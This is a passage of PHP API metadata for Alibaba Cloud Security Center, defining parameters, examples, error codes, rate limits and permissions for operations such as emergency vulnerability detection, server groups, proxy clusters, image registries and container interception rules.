'none', 'chargeType' => 'free', 'abilityTreeCode' => '92364', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the vulnerability to query.', 'type' => 'string', 'required' => true, 'example' => 'scan:ASCV-2019-032401', 'title' => ''], ], [ 'name' => 'UserAgreement', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to perform vulnerability detection. Valid values:'."\n" ."\n" .'- **yes**: Perform vulnerability detection.'."\n" .'- **no**: Do not perform vulnerability detection.', 'type' => 'string', 'required' => true, 'example' => 'yes', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member accounts in the resource folder (Alibaba Cloud account).'."\n" .'>Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16670360956*****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '52A3AEE6-114A-499D-8990-4BA9B27FE0AA', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Perform emergency vulnerability detection', 'summary' => 'Performs emergency vulnerability detection.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyEmgVulSubmit'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyEmgVulSubmit', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"52A3AEE6-114A-499D-8990-4BA9B27FE0AA\\"\\n}","type":"json"}]', ], 'ModifyGroupProperty' => [ 'summary' => 'Modifies the name of a server group.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92365', 'abilityTreeNodes' => ['FEATUREsasGC725T'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Data', 'in' => 'query', 'schema' => ['description' => 'The new property information of the server group after modification. The following parameters are described:'."\n" ."\n" .'- **groupFlag**: The type of the server group. Valid values: **0** (default group) | **1** (other group).'."\n" .'- **groupId**: The ID of the server group.'."\n" .'- **groupIndex**: The sorting number of the server group. Sorted in ascending order.'."\n" .'- **groupName**: The name of the server group. Set this parameter to the new name of the server group. The new name must be different from the original name.'."\n" ."\n" .'> Call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to obtain the values of groupFlag and groupId. The values of groupFlag and groupId cannot be modified. Only the value of groupName can be modified.', 'type' => 'string', 'required' => true, 'example' => '[{"groupFlag":1,"groupId":8436682,"groupIndex":1,"groupName":"example"}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID generated by Alibaba Cloud for this request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify the name of a server group', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyGroupProperty'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyGroupProperty', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\"\\n}","type":"json"}]', ], 'ModifyHybridProxyCluster' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '151384', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.', 'type' => 'string', 'required' => true, 'example' => 'sas-test-cnnf', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks of the proxy cluster.', 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '8B4B6E6D-B0B0-5F05-A14E-82917D9648EE', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => '%s data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify remarks of a proxy cluster', 'summary' => 'Modifies the remarks of a proxy cluster.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyHybridProxyCluster'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyHybridProxyCluster', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8B4B6E6D-B0B0-5F05-A14E-82917D9648EE\\"\\n}","type":"json"}]', ], 'ModifyHybridProxyPolicy' => [ 'summary' => 'Modify proxy policy.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '151388', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the proxy cluster.'."\n", 'type' => 'string', 'required' => true, 'example' => 'sas-proxy', 'title' => ''], ], [ 'name' => 'PolicyInfo', 'in' => 'query', 'schema' => ['description' => 'The policy of the proxy cluster.', 'type' => 'string', 'required' => true, 'example' => '['."\n" .' {'."\n" .' "policyType": "limitFrequency",'."\n" .' "info":'."\n" .' ['."\n" .' {'."\n" .' "type": "file",'."\n" .' "config": "10"'."\n" .' }'."\n" .' ]'."\n" .' },'."\n" .' {'."\n" .' "policyType": "limitBandWidth",'."\n" .' "info":'."\n" .' ['."\n" .' {'."\n" .' "type": "net"'."\n" .' },'."\n" .' {'."\n" .' "type": "process"'."\n" .' }'."\n" .' ]'."\n" .' }'."\n" .']', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'Messgae' => ['description' => 'The message of the request.', 'type' => 'string', 'example' => 'clusterName data not exist', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyHybridProxyPolicy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyHybridProxyPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyHybridProxyPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"Messgae\\": \\"clusterName data not exist\\"\\n}","type":"json"}]', ], 'ModifyIdcProbe' => [ 'summary' => 'Updates the configurations of an IDC probe.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92368', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'IdcName', 'in' => 'query', 'schema' => ['description' => 'The name of the data center.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'IpSegments', 'in' => 'query', 'schema' => ['description' => 'The settings of the CIDR block.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX/24', 'title' => ''], ], [ 'name' => 'WinPort', 'in' => 'query', 'schema' => ['description' => 'The Windows port.', 'type' => 'string', 'required' => false, 'example' => '40', 'title' => ''], ], [ 'name' => 'LinuxPort', 'in' => 'query', 'schema' => ['description' => 'The Linux port.', 'type' => 'string', 'required' => false, 'example' => '80', 'title' => ''], ], [ 'name' => 'IdcRegion', 'in' => 'query', 'schema' => ['description' => 'The region ID of the data center.', 'type' => 'string', 'required' => false, 'example' => 'Hangzhou', 'title' => ''], ], [ 'name' => 'PeriodUnit', 'in' => 'query', 'schema' => ['description' => 'The unit of the scan interval. Valid values:'."\n" ."\n" .'- **day**'."\n" ."\n" .'- **hour**', 'type' => 'string', 'required' => false, 'example' => 'day', 'title' => ''], ], [ 'name' => 'IntervalPeriod', 'in' => 'query', 'schema' => ['description' => 'The scan interval.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUID.', 'type' => 'string', 'required' => true, 'example' => '5b6d4072118f487094199cedf90c****,f6310b7976144639867beea2f346****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The usage status. Valid values:'."\n" ."\n" .'- **0**: enabled.'."\n" ."\n" .'- **1**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\"\\n}","type":"json"}]', 'title' => 'ModifyIdcProbe', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyIdcProbe'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyIdcProbe', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ModifyImageFixCycleConfig' => [ 'summary' => 'Updates the configurations of a scheduled image fix.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '165925', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ImageFixSwitch', 'in' => 'formData', 'schema' => ['description' => 'Specifies whether to enable the schedule image fix.'."\n" ."\n" .'- **on**: enable'."\n" ."\n" .'- **off**: disable', 'type' => 'string', 'required' => false, 'example' => 'on', 'title' => ''], ], [ 'name' => 'ImageFixCycle', 'in' => 'formData', 'schema' => ['description' => 'The cycle of the scheduled fix. Unit: day.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], ], [ 'name' => 'ImageFixTarget', 'in' => 'formData', 'schema' => ['description' => 'The range of the scheduled fix. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'- **type**: The type of the image. The value is fixed to repo.'."\n" ."\n" .'- **target**: The content of the image. The value is in the format of Namespace/Image repository.', 'type' => 'string', 'required' => false, 'example' => '{\\"type\\":\\"repo\\",\\"target\\":[\\"cdp-uat/zentao\\",\\"qa-dac/yyuan9\\",\\"cafdms-qa/xxl-job-admin\\"]}', 'title' => ''], ], [ 'name' => 'ImageTimeRange', 'in' => 'formData', 'schema' => ['description' => 'The time range during which the image was modified. Unit: day.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '30', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates whether the configurations of the scheduled image fix are modified.'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'F7A4DF7E-57A4-5BBF-8290-223754AD****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"F7A4DF7E-57A4-5BBF-8290-223754AD****\\"\\n}","type":"json"}]', 'title' => 'ModifyImageFixCycleConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyImageFixCycleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyImageFixCycleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ModifyImageRegistry' => [ 'summary' => 'Modifies the configuration of an image registry.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'formData', 'schema' => ['description' => 'The image registry ID. Call the [ListImageRegistry](~~471986~~) operation to obtain this ID.', 'type' => 'integer', 'format' => 'int64', 'title' => '', 'required' => false, 'example' => '390103286'], ], [ 'name' => 'UserName', 'in' => 'formData', 'schema' => ['description' => 'The username.', 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'xxxx'], ], [ 'name' => 'Password', 'in' => 'formData', 'schema' => ['description' => 'The password.', 'type' => 'string', 'title' => '', 'required' => false, 'example' => '********************'], ], [ 'name' => 'TransPerHour', 'in' => 'formData', 'schema' => ['description' => 'The number of images to scan per hour.', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '10'], ], [ 'name' => 'DomainName', 'in' => 'query', 'schema' => ['description' => 'The domain name.', 'type' => 'string', 'required' => false, 'example' => '114.55.xxx.xxx', 'title' => ''], ], [ 'name' => 'RegistryHostIp', 'in' => 'query', 'schema' => ['description' => 'The registry IP address.', 'type' => 'string', 'required' => false, 'example' => '192.168.0.1', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port number.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '80', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'PlainResult', 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The data returned. This parameter is not used.', 'type' => 'any', 'example' => '无', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '379a9b8f-107b-4630-9e95-2299a1ea****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => ['description' => 'The time consumed to call the API.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": \\"无\\",\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"379a9b8f-107b-4630-9e95-2299a1ea****\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', 'title' => 'ModifyImageRegistry', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyImageRegistry'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyImageRegistry', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ModifyInstanceAntiBruteForceRule' => [ 'summary' => 'Modifies the anti-brute-force attacks rule for a specified server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server for which you want to modify the anti-brute-force attacks rule.'."\n" .'You can invoke the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUID of the server.', 'type' => 'string', 'required' => true, 'example' => '7cc91747-2845-40d4-bb69-c077597f****', 'title' => ''], ], [ 'name' => 'NewRuleId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-brute-force attacks rule.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '65767', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '4BE468CE-47A0-54F0-98A1-E253546E6A2C', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify the anti-brute-force attacks rule for a specified server', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInstanceAntiBruteForceRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyInstanceAntiBruteForceRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AntiBruteForceRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:antibruteforcerule/{#AntiBruteForceRuleId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4BE468CE-47A0-54F0-98A1-E253546E6A2C\\"\\n}","type":"json"}]', ], 'ModifyInterceptionRule' => [ 'summary' => 'Modifies a container proactive defense interception rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '500018', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~182997~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c17ef568f81884cdab402decd5fcd****', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'tetsRule', 'title' => ''], ], [ 'name' => 'RuleSwitch', 'in' => 'query', 'schema' => ['description' => 'The switch status of the rule. Valid values:'."\n" ."\n" .'- **1**: enabled'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'SrcTarget', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The source rule object. The metric description is as follows:'."\n" ."\n" .'- targetId: the ID of the source object. You can invoke the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to obtain this parameter.', 'type' => 'object', 'required' => false, 'example' => '{"targetId":400989}', 'title' => ''], ], [ 'name' => 'DstTarget', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The destination object. The metric description is as follows:'."\n" ."\n" .'- targetId: the ID of the destination object. You can invoke the [ListInterceptionTargetPage](~~ListInterceptionTargetPage~~) operation to obtain this parameter.'."\n" .'- ports: the list of destination port ranges.', 'type' => 'object', 'required' => false, 'example' => '{"targetId":600069,"ports":["80/8088"]}', 'title' => ''], ], [ 'name' => 'InterceptType', 'in' => 'query', 'schema' => ['description' => 'The interception mode. Valid values:'."\n" .'- **1**: Block Mode'."\n" .'- **2**: Alert mode'."\n" .'- **3**: Allow mode.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'OrderIndex', 'in' => 'query', 'schema' => ['description' => 'The priority of the rule. The priority ranges from 1 to 1000. A smaller number indicates a higher priority.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '6961B151-B43C-533B-8B2E-1D3151D7F5B2', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify a container proactive defense interception rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInterceptionRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyInterceptionRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6961B151-B43C-533B-8B2E-1D3151D7F5B2\\"\\n}","type":"json"}]', ], 'ModifyInterceptionRuleSwitch' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster that you want to modify.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ce5c29aba99694ade9ba85dc620b4****', 'title' => ''], ], [ 'name' => 'RuleSwitch', 'in' => 'query', 'schema' => ['description' => 'The switch status of the rule. Valid values:'."\n" ."\n" .'- **1**: Enabled.'."\n" .'- **0**: Disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'RuleIds', 'in' => 'query', 'schema' => ['description' => 'The list of rule IDs to operate on. Separate multiple IDs with commas (,).'."\n" .'> You can call the [ListInterceptionRulePage](~~ListInterceptionRulePage~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '403287', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'DE725A60-95F2-50E8-8F5D-81055215E7DA', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify container proactive defense interception policy switch', 'summary' => 'Modifies the switch status of container proactive defense interception policies.', 'changeSet' => [], 'flowControl' => [ 